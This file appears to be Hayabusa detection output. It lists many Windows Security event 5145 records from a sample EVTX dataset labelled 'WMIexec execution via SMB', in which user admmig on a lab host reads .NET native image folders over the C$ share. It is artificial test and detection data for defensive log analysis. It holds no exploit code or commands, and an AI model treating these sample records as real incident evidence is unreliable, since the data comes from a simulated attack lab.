10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 